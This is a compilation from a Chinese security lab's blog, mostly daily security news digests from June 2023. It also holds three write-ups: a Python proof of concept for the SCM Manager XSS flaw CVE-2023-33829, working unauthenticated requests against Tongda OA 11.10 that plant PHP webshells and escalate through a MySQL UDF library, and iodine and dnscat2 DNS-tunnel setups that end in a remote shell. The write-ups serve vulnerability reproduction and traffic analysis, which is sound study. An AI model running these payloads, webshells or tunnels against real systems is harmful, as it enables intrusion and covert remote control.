网络安全日报 2023年06月08日
1、Play勒索软件团伙攻击西班牙银行并威胁泄露文件 https://www.malwarebytes.com/blog/news/2023/06/play-ransomware-gang-compromises-spanish-bank-threatens-to-leak-files 近日,Play勒索软件团伙对西班牙银行Globalcaja发起攻击,该团伙在其泄露网站上列出了该银行作为其最新的受害者,并声称窃取了包括护照信息、合同和客户/员工文件等在内的私人和敏感数据。 2、Cyclops勒索团伙向网络犯罪人员提供基于Go的窃取器 https://www.uptycs.com/blog/cyclops-ransomware-stealer-combo 与Cyclops勒索软件有关联的威胁行为者提供了一个信息窃取器恶意软件,该恶意软件旨在从被感染的主机中捕获敏感数据。研究人员说:“这个勒索软件及服务(RaaS)的威胁行为者在论坛上推广其产品。它要求那些使用其恶意软件进行恶意活动的人分享利润。”Cyclops勒索软件以针对所有主要桌面操作系统,包括Windows、macOS和Linux而闻名。 3、LockBit 2.0再度出现,网络安全面临新挑战 https://blog.cyble.com/2023/06/06/lockbit-ransomware-2-0-resurfaces/ 近日,一款名为LockBit的勒索软件再次出现在网络安全领域。LockBit 2.0采用了更加隐蔽的攻击手段和更高的赎金要求,给企业和个人用户带来了极大的安全威胁。该软件利用Windows操作系统中的漏洞进行攻击,并使用加密算法对受害者的数据进行加密,使其无法访问。 4、免费VPN服务商i2VPN被黑客泄露管理凭证 https://www.safetydetectives.com/news/i2vpn-exposed-telegram/ 2VPN是一款无需注册的免费VPN代理服务器应用,可在Google Play和App Store上下载。2023年5月29日,一些黑客在Telegram上发布了i2VPN的管理凭证,包括管理员的电子邮件地址和密码,并声称已经破解了i2VPN的管理面板,可以访问数十万用户的信息。据Google Play的统计数据,截至2023年5月,i2VPN已经被下载了超过50万次。 5、研究人员发现数万个被感染的安卓应用 https://www.bitdefender.com/blog/labs/tens-of-thousands-of-compromised-android-apps-found-by-bitdefender-anomaly-detection-technology/ 研究人员发现了一场隐藏在全球移动设备上超过六个月的恶意软件活动。这场恶意软件活动的目的是向安卓设备强行推送广告,以获取收益。然而,参与这场活动的黑客可以轻易地改变策略,将用户重定向到其他类型的恶意软件,例如窃取凭证和财务信息的银行木马或勒索软件。截至目前,研究人员已经发现了6万个完全不同的样本(独特的应用),并且怀疑还有更多的 6、Satacom下载器传播窃取加密货币的浏览器扩展 https://securelist.com/satacom-delivers-cryptocurrency-stealing-browser-extension/109807/ Satacom下载器,又称LegionLoader,是一种著名的恶意软件家族,于2019年出现。研究人员发现并报告了一场与Satacom下载器相关的恶意软件传播活动。该活动的主要目的是通过安装一个针对Chromium-based浏览器(如Chrome、Brave和Opera)的扩展程序,来从受害者的账户中窃取加密货币。 7、黑客组织声称对Outlook.com发动DDoS攻击导致服务中断 https://www.bleepingcomputer.com/news/microsoft/outlookcom-hit-by-outages-as-hacktivists-claim-ddos-attacks/ Outlook.com是微软的网络邮件服务,近日遭遇了一系列的服务中断事件,影响了全球数百万用户。6月6日,一个自称Anonymous Sudan的黑客组织在Telegram上宣称,他们对Outlook.com发动了DDoS攻击,以抗议美国干涉苏丹的内政。 8、英国航空公司,BBC和Boots受到Zellis数据泄露的影响 https://securityaffairs.com/147119/data-breach/zellis-data-breach-bbc-ba.html 总部位于英国的薪资公司Zellis受到针对文件传输公司MOVEit的网络安全攻击的影响,英国航空公司是受影响的公司之一。 9、卡巴斯基发布检测零点击iOS攻击的工具 https://www.bleepingcomputer.com/news/security/new-tool-scans-iphones-for-triangulation-malware-infection/ 网络安全公司卡巴斯基(Kaspersky)发布了一个工具,用于检测Apple iPhone和其他iOS设备是否感染了新的“三角测量”恶意软件。 10、月球卫星为太空黑客提供在轨目标 https://www.darkreading.com/ics-ot/moonlighter-satellite-in-orbit-target-space-hackers Moonlighter为红队提供了运营中断的机会,将于8月与DEF CON一起进行计时。 免责声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
网络安全日报 2023年06月07日
1、华硕 RT-AC86U 存在命令注入漏洞 https://www.asus.com.cn/networking-iot-servers/wifi-routers/asus-wifi-routers/rt-ac86u/ 华硕 RT-AC86U是一款双频千兆无线电竞路由器。华硕 RT-AC86U 在固件版本 v3.0.0.4.386.51255 中存在命令注入漏洞。由于路由器没有对特殊字符进行过滤,经过身份认证的攻击者可以进行命令注入,从而执行任意系统命令,获取服务器权限。 2、Clop勒索软件团伙利用MOVEit零日漏洞进行数据窃取 https://www.bleepingcomputer.com/news/security/clop-ransomware-claims-responsibility-for-moveit-extortion-attacks Clop勒索软件团伙利用MOVEit Transfer平台的一个零日漏洞,入侵多家公司的服务器并窃取数据。MOVEit Transfer是一个广泛用于企业在互联网上共享大文件的工具,该漏洞允许黑客未经授权访问受影响的MOVEit服务器的数据库。 3、Play勒索软件团伙攻击西班牙银行并威胁泄露文件 https://www.malwarebytes.com/blog/news/2023/06/play-ransomware-gang-compromises-spanish-bank-threatens-to-leak-files 近日,Play勒索软件团伙对西班牙银行Globalcaja发起攻击,该团伙在其泄露网站上列出了该银行作为其最新的受害者,并声称窃取了包括护照信息、合同和客户/员工文件等在内的私人和敏感数据。 4、Google修补了2023年第三个Chrome零日漏洞 https://chromereleases.googleblog.com/2023/06/stable-channel-update-for-desktop.html?m=1 Google在周一发布了一个Chrome 114安全更新,修补了CVE-2023-3079,这是2023年在该浏览器中发现的第三个零日漏洞。Google说,最新版本的Chrome修复了两个缺陷,其中包括CVE-2023-3079,一个影响V8 JavaScript引擎的类型混淆问题。 5、信息窃取程序Bandit Stealer利用Telegram回传数据 https://www.zscaler.com/blogs/security-research/technical-analysis-bandit-stealer Bandit Stealer是一款新型的信息窃取程序,它可以从多种网络浏览器、FTP客户端、电子邮件客户端和加密货币钱包应用中窃取存储的凭证、Cookie和信用卡信息,并通过Telegram将窃取的信息发送给远程服务器。 6、KeePass v2.54修复了泄露明文主密码的漏洞 https://keepass.info/news/n230603_2.54.html KeePass发布了2.54版本,修复了允许从应用程序内存中提取明文主密码的CVE-2023-32784漏洞。该漏洞于5月18日被一位名为vdohney的安全研究员披露,并在GitHub上发布了一个证明概念工具。 7、尽快更新!苹果iTunes出现漏洞,威胁Windows电脑安全 https://www.freebuf.com/news/368603.html 苹果公司的iTunes在微软Windows系统上使用时存在一个安全漏洞,可能使攻击者劫持受影响设备的操作系统。虽然目前苹果已经打上了补丁,但该漏洞已经存在了六个月之久。 8、 Xplain黑客攻击影响了瑞士州警察和Fedpol https://securityaffairs.com/147047/data-breach/fedpol-swiss-police-cyber-attack.html 瑞士警方对伯尔尼IT公司Xplain的网络攻击展开了调查,该公司为几个联邦和州政府部门,军队,海关和联邦警察局(Fedpol)提供服务。瑞士报纸Le Temps周六首次报道了袭击的消息。 9、FTC对亚马逊Alexa和Ring的隐私侵权行为处以3080万美元罚款 https://thehackernews.com/2023/06/ftc-slams-amazon-with-308m-fine-for.html 美国联邦贸易委员会(FTC)对亚马逊旗下的Alexa语音助手和Ring(智能门铃)安全摄像头的一系列隐私问题累计罚款3080万美元。其中包括对违反儿童隐私法的2500万美元的罚款,因为他们永久保存了Alexa的语音记录,并阻止父母进行删除。 10、P0级故障!唯品会 329 宕机事件相关负责人被开除 https://www.freebuf.com/news/368599.html 6 月 5 日,唯品会发布《关于 329 机房宕机故障处理的公告》,宣布了 3 月 29 日唯品会宕机事件的最终处理结果,将 3 月 29 日发生的机房宕机故障判定为 P0 级故障,并开除了平台部相关负责人。 免责声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
SCM Manager XSS漏洞复现(CVE-2023-33829)
一、漏洞描述 漏洞简述 SCM-Manager 是一款开源的版本库管理软件,同时支持 subversion、mercurial、git 的版本库管理。安装简单,功能较强,提供用户、用户组的权限管理 ,有丰富的插件支持。由于在MIT的许可下是开源的,因此它允许被用于商业用途,而且其代码可以在GitHub上获取到。该项目最初只是被用于研究目的,而在其2.0版本之后,被Cloudogu公司接手管理和开发了其各种代码库,以便为各个公司提供专业的企业级支持。 该漏洞主要为攻击者利用其多个功能的描述字段的代码缺陷,构造payload进行XSS攻击。 漏洞影响范围 供应商:Cloudogu 产品:SCM Manager 确认受影响版本:SCM Manager 1.2 <= 1.60 修复版本:>1.60 最新版本为2.43.1 二、漏洞复现实战 环境搭建 docker镜像: https://bitbucket.org/sdorra/docker-scm-manager/src/master/利用shell脚本搭建 shell: #!/bin/bash mkdir /var/lib/scm chown 1000:1000 /var/lib/scm docker run -v /var/lib/scm:/var/lib/scm -p 8080:8080 sdorra/scm-manager 漏洞复现 首先访问SCM Manager,需身份认证 Username : scmadmin Password: scmadmin repositories repository功能下Description字段该漏洞可利用 创建新repository,并payload进行利用 Git类型: Subversion类型: Users User功能下Display Name字段该漏洞可利用 创建新repository,并payload进行利用 可以看到新创建的账号中Display Name属性下显示异常,且XSS payload利用成功 Groups Group功能下Description字段该漏洞可利用 另外可以根据POC进行利用 POC: import requests import argparse import sys # Main menu parser = argparse.ArgumentParser(description='CVE-2023-33829 exploit') parser.add_argument("-u", "--user", help="Admin user or user with write permissions") parser.add_argument("-p", "--password", help="password of the user") args = parser.parse_args() # Credentials user = sys.argv[2] password = sys.argv[4] # Global Variables main_url = "http://localhost:8080/scm" # Change URL if its necessary auth_url = main_url + "/api/rest/authentication/login.json" users = main_url + "/api/rest/users.json" groups = main_url + "/api/rest/groups.json" repos = main_url + "/api/rest/repositories.json" # Create a session session = requests.Session() # Credentials to send post_data={  'username': user, # change if you have any other user with write permissions  'password': password # change if you have any other user with write permissions } r = session.post(auth_url, data=post_data) if r.status_code == 200:  print("[+] Authentication successfully") else:  print("[-] Failed to authenticate")  sys.exit(1) new_user={  "name": "newUser",  "displayName": "<img src=x onerror=alert('XSS')>",  "mail": "",  "password": "",  "admin": False,  "active": True,  "type": "xml" } create_user = session.post(users, json=new_user) print("[+] User with XSS Payload created") new_group={  "name": "newGroup",  "description": "<img src=x onerror=alert('XSS')>",  "type": "xml" } create_group = session.post(groups, json=new_group) print("[+] Group with XSS Payload created") new_repo={  "name": "newRepo",  "type": "svn",  "contact": "",  "description": "<img src=x onerror=alert('XSS')>",  "public": False } create_repo = session.post(repos, json=new_repo) print("[+] Repository with XSS Payload created") 漏洞修复 建议更新至SCM Manager最新版本,目前为2.43.1 结束语 本文主要介绍了CVE-2023-33829 SCM Manager XSS漏洞复现过程,漏洞主要体现于攻击者利用其多个功能的描述字段的代码缺陷,构造payload进行XSS攻击。 本漏洞可参考之处为敏感功能避免重复调用非敏感功能代码,并做好过滤与校验,进行必要的安全测试。
网络安全日报 2023年06月06日
1、在线卖家遭受新型窃取信息恶意软件攻击 https://www.bleepingcomputer.com/news/security/online-sellers-targeted-by-new-information-stealing-malware-campaign/ 一种名为Vidar的窃取信息恶意软件正在通过一场新的网络攻击,针对在线卖家,以窃取他们的凭证,从而进行更有破坏性的攻击。这场新的攻击于本周开始,攻击者通过电子邮件和网站联系表单,向网店管理员发送投诉。这些电子邮件假装是网店的客户,称他们在下单时遇到了错误,但银行账户却被扣除了550美元。 2、微软将于2023年底停止支持Windows上的Cortana https://www.bleepingcomputer.com/news/microsoft/microsoft-is-killing-cortana-on-windows-starting-late-2023/ 微软宣布,将于2023年底停止支持Windows上的Cortana应用。 3、Windows 11将默认要求SMB签名以防止NTLM中继攻击 https://blogs.windows.com/windows-insider/2023/06/02/announcing-windows-11-insider-preview-build-25381/ 微软表示,为了防止NTLM中继攻击,从6月2日开始向Canary Channel内部人员推送的Windows版本开始,将默认要求所有连接使用SMB签名(又称安全签名)。 4、BlackSuit与Royal勒索软件存在高度相似性 https://www.trendmicro.com/en_us/research/23/e/investigating-blacksuit-ransomwares-similarities-to-royal.html BlackSuit是一种新出现的勒索软件,可以同时针对Windows和Linux用户。它在加密文件后添加blacksuit扩展名,并在目录中放置赎金说明,要求受害者访问其TOR聊天网站并支付赎金。 5、Zyxel发布防火墙加固指南以修复命令注入漏洞 https://www.zyxel.com/global/en/support/security-advisories/zyxels-guidance-for-the-recent-attacks-on-the-zywall-devices Zyxel是一家网络设备制造商,其防火墙产品存在一个操作系统命令注入漏洞,该漏洞由TRAPA Security发现,并被赋予CVE-2023-28771编号。该漏洞利用防火墙版本中错误消息处理的不当,允许未经身份验证的攻击者通过向受影响的设备发送特制的数据包,远程执行一些操作系统命令。 6、VMware揭秘TrueBot僵尸网络的攻击手法 https://blogs.vmware.com/security/2023/06/carbon-blacks-truebot-detection.html 近日,VMware安全研究人员揭秘了一个名为TrueBot的僵尸网络的攻击手法。TrueBot是一个由Silence组织开发的下载器木马,利用Netwrix漏洞传播,可以收集被感染系统的信息,并作为进一步攻击的跳板。 7、CMDStealer利用CMD脚本和LOLBaS窃取网银信息 https://blogs.blackberry.com/en/2023/05/cmdstealer-targets-portugal-peru-and-mexico 研究人员揭露了一个名为CMDStealer的金融诈骗活动。CMDStealer是由一个不知名的巴西威胁行为者发起的攻击,目标是窃取西班牙语和葡萄牙语的网银用户的账号信息。受害者主要分布在葡萄牙、墨西哥和秘鲁。 8、NoEscape勒索软件利用反射式DLL注入技术 https://blog.cyble.com/2023/06/04/evasive-noescape-ransomware-uses-reflective-dll-injection/ NoEscape是一种新型的勒索软件即服务(RaaS),于2023年5月底在一个网络犯罪论坛上推出,招募合作伙伴进行分发。NoEscape可以生成多种类型的可执行文件,针对Windows 7及以上版本、Windows XP、Linux/ESXi服务器等系统。 9、Atomic Wallet遭黑客攻击,超过3500万美元的加密货币被盗 https://www.bleepingcomputer.com/news/security/atomic-wallet-hacks-lead-to-over-35-million-in-crypto-stolen/ Atomic Wallet是一种移动和桌面端的加密货币钱包,可以存储多种加密货币。该钱包支持多个操作系统,包括Windows、Android、iOS、macOS和Linux。2023年6月3日,Atomic Wallet在推特上表示,他们收到了用户钱包被入侵的报告,并开始调查这一问题。 10、新型Magecart攻击利用合法域名隐藏身份 https://www.akamai.com/blog/security-research/new-magecart-hides-behind-legit-domains 研究人员发现并分析了一种新的持续进行的Magecart风格的网络攻击,旨在从电子商务网站窃取个人身份信息和信用卡信息。受害者分布在北美、拉丁美洲和欧洲,规模不一。 免责声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
网络安全日报 2023年06月05日
1、Kimsuky组织模仿关键人物进行针对性网络攻击 https://www.nsa.gov/Press-Room/Press-Releases-Statements/Press-Release-View/Article/3413621/us-rok-agencies-alert-dprk-cyber-actors-impersonating-targets-to-collect-intell/ 美国和韩国的网络安全和情报机构联合发布了一份关于朝鲜网络攻击者的警告,指出他们模仿关键人物进行针对性网络攻击。这些攻击者属于朝鲜的APT组织Kimsuky(又称APT43),他们利用钓鱼邮件和伪造的网站来诱使目标输入自己的凭证,然后利用这些凭证来访问目 2、MOVEit Transfer遭遇零日漏洞攻击 https://community.progress.com/s/article/MOVEit-Transfer-Critical-Vulnerability-31May2023 Progress Software公司的MOVEit Transfer管理文件传输应用存在一个严重的漏洞,该漏洞已经被黑客广泛利用来控制脆弱的系统。该漏洞尚未被分配一个CVE编号,涉及一个SQL注入漏洞,允许未经授权的访问和提升权限。该漏洞影响了MOVEit Transfer 2021.1.0.0版本及以下版本,该应用被广泛用于在组织内部和外部安全地传输敏感数据。Progress Software公司已经发布了一个 3、恶意PyPI包混合源代码和编译代码来躲避安全检测 https://www.reversinglabs.com/blog/when-python-bytecode-bites-back-who-checks-the-contents-of-compiled-python-files 研究人员在Python Package Index(PyPI)中发现了一种新颖的攻击,利用编译后的Python代码来逃避检测。这可能是第一种利用Python字节码(PYC)文件可以直接执行的事实来发动供应链攻击的例子,并且是在PyPI中恶意提交激增的背景下发生的。如果是这样,它将带来另一种供应链风险,因为这种攻击很可能会被大多数只扫描Python源代码(PY)文件 4、Qakbot恶意软件利用住宅IP进行动态攻击 https://blog.lumen.com/qakbot-retool-reinfect-recycle/ Qakbot是一种银行木马,也被称为Pinkslipbot或Qbot,最早出现于2007年,主要通过电子邮件劫持和社会工程学来传播,并感染Windows主机。这个僵尸网络采用了一些技术来隐藏其基础设施,例如使用住宅IP地址和感染的Web服务器,而不是使用托管的虚拟专用服务器(VPS)网络。Qakbot根据安全策略的收紧和防御的演变,不断改变其初始入侵的方式。研究人员跟踪了Qakbot最近的活动,观察了其网络结构,并获得了一些关于支持Qakbot作为一种逃避式和顽固威胁的方法的关键见解 5、研究人员披露Tron零日漏洞发现和验证细节 https://0d.dwalletlabs.com/game-of-tron-critical-0-day-in-tron-multi-signature-wallets-2c3e90668dc0 研究人员发现了一个影响Tron多重签名账户的严重零日漏洞,该漏洞可能导致超过5亿美元的数字资产面临风险。该漏洞涉及一个SQL注入漏洞,允许攻击者在没有任何验证的情况下访问和修改多重签名账户的数据,包括增加或删除签名者、更改阈值、转移资金等。该漏洞影响了Tron 4.1.2版本及以下版本,该版本于2021年9月发布。研究人员在2021年2月通过一个漏洞赏金计划向Tron报告了该漏洞,并在几天内得到 6、MOVEit Transfer中的零日漏洞被用于数据窃取 https://www.mandiant.com/resources/blog/zero-day-moveit-data-theft 研究人员披露了Progress Software的托管文件传输产品MOVEit Transfer中存在一个零日漏洞,该漏洞已被分配CVE-2023-34362,并被广泛利用来部署网络后门和窃取数据。研究人员表示,这个漏洞最早在5月27日被利用,导致网络后门的部署和数据的窃取。 7、DogeRAT 恶意软件针对银行和娱乐行业 https://cyware.com/news/dogerat-malware-eyes-banking-and-entertainment-sectors-a720b704 发现了一种新的Android恶意软件威胁,主要针对印度的用户。该恶意软件名为DogeRAT,通过伪装成Opera Mini,OpenAI ChatGPT以及Netflix和YouTube高级版本的社交媒体和消息传递平台进行分发。 8、威胁行为者可以从Google云端硬盘中窃取数据而不会留下痕迹 https://www.helpnetsecurity.com/2023/06/01/data-exfiltration-google-drive/ Mitiga研究人员说,Google Workspace(以前称为G Suite)有一个弱点,可以防止恶意的外部人员或内部人员从Google云端硬盘发现数据泄露。 9、Splunk Enterprise修补了一个高严重性漏洞 https://www.securityweek.com/high-severity-vulnerabilities-patched-in-splunk-enterprise 其中最严重的是 CVE-2023-32707,这是一个权限提升问题,允许具有“edit_user”功能的低特权用户通过特制的 Web 请求将权限提升给管理员。 10、6月1日起,谷歌对Chrome的沙盒逃逸漏洞的奖金增加三倍 https://www.freebuf.com/news/368272.html 谷歌6月1日宣布,对其Chrome网络浏览器的沙盒逃逸链漏洞的奖励增加三倍,直至2023年12月1日。该公司的这一举措旨在鼓励安全研究人员识别和报告可能破坏Chrome浏览器安全机制的漏洞,最终帮助该软件增强抵御攻击的整体弹性。Chrome浏览器漏洞奖励计划的奖金从6月1日开始生效,只适用于首个功能性全链漏洞。通过提交一个全链漏洞,参与者可以获得高达18万美元的奖励,同时也有可能再获得其他奖金,而在六个月的窗口期提交的其他漏洞,最高可获得12万美元的奖励。 免责声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
某OA 11.10 未授权任意文件上传
漏洞简介 之前也对通达 oa 做过比较具体的分析和漏洞挖掘,前几天看到通达 oa 11.10 存在未授权任意文件上传漏洞,于是也打算对此进行复现和分析。 环境搭建 https://www.tongda2000.com/download/p2019.php下载地址 :https://cdndown.tongda2000.com/oa/2019/TDOA11.10.exe 查看版本信息 漏洞复现 利用方式一 http://192.168.222.128/general/appbuilder/web/portal/gateway/getdata?activeTab=%E5%27%19,1%3D%3Eeval($_POST[c]))%3B/*&id=19&module=Carouselimage 利用方式二 无法直接写入带有变量的 php 文件 所以首先利用 无参 webshell <?php @eval(next(getallheaders())); GET /general/appbuilder/web/portal/gateway/getdata?activeTab=%e5%27,1%3d%3Efwrite(fopen(%22C:/MYOA/webroot/general/1.php%22,%22w+%22),%22%3C?php%20eval(next(getallheaders()));%22))%3b/*&id=266&module=Carouselimage HTTP/1.1 Host: 192.168.222.128 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close 上传成功后再利用第一次生成的恶意文件再生成文件。 GET /general/test.php HTTP/1.1 Host: 192.168.121.147:8081 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Cookie: file_put_contents('test1.php','<?php @eval($_REQUEST[1]);'); Content-Length: 28 Upgrade-Insecure-Requests: 1 但是无法直接直接命令,这是因为权限过低的原因 所以想要进一步的操作,就需要提权。 通过查看配置文件看到 mysql 数据库的密码。 利用蚁剑连接数据库。 查看 mysql 的版本。 SqlMap 中集成了对应的提权文件,不过需要先进行解密操作。 udf.dll的是经过编码运算的,所以需要有一个解密脚本,在这个路径下 sqlmap-master\extra\cloak 对应的 dll 文件路径 sqlmap-master\data\udf\mysql\windows\64 执行解码操作 cloak.py -d -i sqlmap-master\data\udf\mysql\windows\64\lib_mysqludf_sys.dll_ 然后将解码好的文件上传到 mysql/lib/plugin/ 路径下 create function sys_eval returns string soname 'lib_mysqludf_sys.dll'; select sys_eval("whoami"); 漏洞分析 general\appbuilder\modules\portal\controllers\GatewayController.php#actionGetdata 首先判断是否存在参数 id 之后根据 module 的值依次执行 GetData与toUTF8方法。 general\appbuilder\modules\portal\models\PortalComponent.php#GetData 根据 id 查询,返回相对对应的数值 $activeTab 的值是从外部获取的。 根据不同的 $module 调用不同的get_data 方法 general\appbuilder\modules\portal\components\AppDesignComponents.php#data_analysis general\appbuilder\modules\appdesign\models\AppUtils.php#toUTF8 这里有一点类似于宽字节注入,利用类型的转换,使得传入的单引号转移后又被编码转换成汉字,最终使得单引号逃逸出来。最后实现命令执行。
网络安全日报 2023年06月02日
1、新型APT组织Dark Pink持续攻击亚欧地区 https://www.group-ib.com/blog/dark-pink-episode-2/ Dark Pink是一个新发现的APT组织,它主要针对亚太地区和欧洲的政府和军事机构进行网络间谍活动。这个组织使用定制化的钓鱼邮件,携带恶意文档,利用Office的公式编辑器漏洞,向受害者的计算机中植入多种自制的恶意工具。这些工具包括一个定时扫描器,一个下载器,以及一个新型后门程序。 2、ApacheNiFi服务器被利用挖矿数据流管理平台遭受威胁 https://isc.sans.edu/diary/Your%20Business%20Data%20and%20Machine%20Learning%20at%20Risk%3A%20Attacks%20Against%20Apache%20NiFi/29900 Apache NiFi是一个开源的数据流管理平台,它可以用于收集、处理、分发和分析大量的数据。它也可以用于支持机器学习和人工智能的应用。然而,这个平台也存在一些安全漏洞,比如未授权访问、远程代码执行、跨站脚本等,这些漏洞可能被黑客利用,从而将Apache NiFi服务器纳入一个挖矿僵尸网络中。研究人员提供了一些实际的攻击案例,以 3、乌克兰CERT警告新一轮SmokeLoader攻击活动 https://cert.gov.ua/article/4755642 SmokeLoader是一个恶意软件加载器,它可以下载和执行其他恶意软件,比如银行木马、勒索软件、密码窃取器等。它也可以用于收集受害者的系统信息,并与远程服务器通信。乌克兰的计算机应急响应小组(CERT-UA)警告,SmokeLoader正在被一些黑客组织用于针对乌克兰和其他国家的攻击活动。这些黑客组织被认为与俄罗斯有关联。乌克兰CERT提供了一些实际的攻击案例,以及一些防御措施,比如使用强密码、启用双因素认证、限制网络访问、更新补丁等。 4、技嘉应用中心存在后门风险,影响数百款电脑 https://eclypsium.com/blog/supply-chain-risk-from-gigabyte-app-center-backdoor/ Eclypsium是一家专注于供应链安全的公司,它的平台最近在技嘉的电脑系统中发现了可疑的后门行为。经过进一步分析,发现这是技嘉的应用中心功能在UEFI固件中嵌入了一个Windows可执行文件,该文件在系统启动过程中被执行,并从互联网上不安全地下载和执行额外的有效载荷。这种后门行为可能会被恶意攻击者利用,从而导致供应链攻击、本地环境攻击或恶意软件持久化。Eclypsium已经与技嘉合作,寻求解决这个问题的方法。目前,建议受影响的用户关 5、BlackCat勒索软件升级隐蔽性、速度和数据窃取能力 https://securityintelligence.com/posts/blackcat-ransomware-levels-up-stealth-speed-exfiltration/ BlackCat勒索软件是一种流行的网络威胁,也是勒索软件即服务(RaaS)模式的一个典型例子。它使用了不常见的编程语言(Rust),可以攻击多种设备和操作系统,并与多个活跃的威胁行为组织有关联。BlackCat勒索软件的入侵和执行方式根据部署它的RaaS合作伙伴而不同,但结果都是一样的——目标数据被加密、窃取,并用于“双重勒索”,即攻击者威胁如果不支付赎金,就会公开泄露被盗数据。根据研究人员的分析, 6、丰田数据泄露再次暴露了司机的详细信息 https://cybernews.com/news/wildfires-cause-internet-outage-in-canada/ 丰田承认在不到三周的时间内发生了第二次数据泄露事件,汽车制造商暴露了司机的敏感细节,如姓名和家庭住址。 7、PixBankBot瞄准巴西的即时支付平台Pix https://thecyberexpress.com/pixbankbot-android-trojan-hits-brazil-app-pix/ Pix是一个快速便捷的即时支付平台,由该国货币当局巴西中央银行(BCB)开发和监督。 8、希腊教育部遭遇最严重网络攻击:全国考试被干扰 引发政治动荡 https://www.secrss.com/articles/55203 正值希腊全国高中期末考试,“学科库”国家题库平台遭到攻击,导致教师无法从题库平台抽取考题,部分考生不得不在教室等待数小时。 9、北京公交APP惊现诈骗广告 https://www.secrss.com/articles/55188 近日,有网友反映,其在使用北京公交APP时,遇到诈骗广告,该广告伪装成登录入口,十分隐蔽,稍不注意就会被扣29.8元。 10、梭子鱼邮件安全设备零日漏洞被利用长达七个月 https://www.secrss.com/articles/55238 网络和电子邮件安全公司梭子鱼(Barracuda Networks)本周三透露,其10天前修补的零日漏洞已被利用至少七个月,攻击者利用该漏洞在梭子鱼的大型企业客户的网络中投放恶意软件并窃取数据。 免责声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
DNS隧道流量分析
1.域名准备 选择哪家的云都没问题,国内云需要实名,不建议使用,这里我选择的TX云,因为之前注册过了,自己拿来做个流量分析不成问题 域名添加解析记录 需要准备自己的vps作为DNS隧道的服务端,且需要添加ns记录 2.iodined搭建 关闭53端口关闭开机自启 systemctl stop systemd-resolved systemctl disable systemd-resolved 之后53端口已关闭 启动服务端 iodined -f -c -P 1qaz@WSX 192.168.100.1 ns.xxx.xyz -DD 参数说明 -f:在前台运行 -c:禁止检查所有传入请求的客户端IP地址。 -P:客户端和服务端之间用于验证身份的密码。 -D:指定调试级别,-DD指第二级。“D”的数量随级别增加。 客户端 iodine -f -P 1qaz@WSX ns.aligoogle.xyz -M 200 客户端连接正常,且服务端显示客户端连接成功 查看客户端网卡,因为配置的时候一直不太稳定,所以这里服务端分配的虚拟网卡我更换为了192.168.121.1 测试隧道是否通信 延时比较高,也不稳定。 通过隧道连接目标主机 ssh -p 2222 root@192.168.121.2 这里我换ssh的端口了 但是发现安全设备在连接高危端口的时候无告警 3.流量分析 抓取dns0网卡的流量 tcpdump -i dns0 port 53 -w file.pcap 参数-i 指定网卡, port 指定端口,DNS使用53端口,-w 写入文件。 查看日志发现所有的流量都是DNS日志,但是目的都为自己的VPS 其实能够根据流量特征识别工具类型。 4.试错 本来我是想使用穿透工具通过隧道穿透的,这里使用nps做隧道走socks,想走虚拟网卡需要修改nps配置文件 ./npc -server=192.168.120.1:63323 -vkey=n4jg3lrvg19qlqth -type=tcp 查看nps上线后,需要做端口转发,不做端口转发无法直接使用虚拟地址的隧道,这里其实没有这么走的意义 但是这里发现行不通,参考了一些文章,发现某位师傅写的有点儿问题,这里大可不必,没有所谓的套层+转口转发,单一走隧道都不稳定以及卡的要死,怎么玩儿套娃。 5. dnscat2搭建 安装准备 git clone https://github.com/iagox86/dnscat2.git cd dnscat2/server/ curl -sSL https://get.rvm.io | bash source /etc/profile.d/rvm.sh rvm install 2.6.0 source /etc/profile.d/rvm.sh rvm use 2.6.0 gem install bundler bundle install ruby ./dnscat2.rb 需要注意这里开放vps的53的udp端口 firewall-cmd --zone=public --add-port=53/udp --permanent firewall-cmd --reload 国内服务器TX云的话需要更换源,下载文件需要科学上网,境内下载tools找不到服务 客户端 git clone https://github.com/iagox86/dnscat2.git cd dnscat2/client/ make ./dnscat --dns server=IP,port=53 --secret=f361f307f523b07352d0bab1b765a888   //直连模式 ./dnscat --dns server=ling.domain --secret=1qaz2wsx             //中继模式 直连模式 Server: Client: 中继模式 ruby ./dnscat2.rb ns.domain -e open -c 1qaz2wsx --no-cache 客户端 ./dnscat --dns domain=ling.domain --secret=1qaz2wsx   ./dnscat --dns server=www.domain --secret=1qaz2wsx   服务端命令 sessions 列出所有session session -i 2 进入session 2 shell:创建交互式shell suspend:返回上一层 exit:退出 clear(清屏) 